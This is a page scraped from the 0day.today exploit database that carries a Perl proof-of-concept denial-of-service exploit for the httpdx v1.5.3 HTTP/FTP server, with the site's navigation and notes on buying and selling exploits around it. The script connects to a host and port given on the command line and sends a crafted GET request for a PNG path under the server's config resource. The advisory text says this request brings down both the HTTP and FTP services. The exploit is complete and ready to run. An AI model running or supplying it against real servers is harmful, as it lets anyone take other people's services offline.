0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Httpdx v1.5.3 Remote Break Server HTTP
====================================================================== httpdx v1.5.3 PNG File Handling Remote Denial of Service Vulnerability ====================================================================== Vulnerable: httpdx httpdx 1.5.3 #!/usr/bin/perl # # Program : Httpdx v1.5.3 # PoC : Remote Break Services # Homepage : http://sourceforge.net/projects/httpdx/ # Found by : Jonathan Salwan # This Advisory : Jonathan Salwan # Contact : submit@shell-storm.org # # # //----- Application description # # Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs # with only few threads. Includes directory listing, virtual hosting, basic auth., support # for PHP, Perl, Python, SSI, etc. All settings in one config/script file. # # # //----- Description of vulnerability # # The vulnerability is caused due to an input validation error when processing HTTP requests. This can be # exploited to break all services http & ftp. # # # # //----- Credits # # http://www.shell-storm.org <submit@shell-storm.org> # # use IO::Socket; print "\n[x]Httpdx v1.5.3 - Remote Break Services\n"; if (@ARGV < 1) { print "[-] Usage: <file.pl> <host> <port>\n"; print "[-] Exemple: file.pl 127.0.0.1 80\n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n"; print "[+] Sending request: GET /res~httpdx.conf/image/php.png HTTP/1.1\\r\\nHost: $ip\\r\\n\\r\\n"; $msg = "GET /res~httpdx.conf/image/php.png HTTP/1.1\r\nHost: $ip\r\n\r\n"; $socket->send($msg); print "\n[+] Done.\n\n"; close($socket); # 0day.today [2024-07-02] #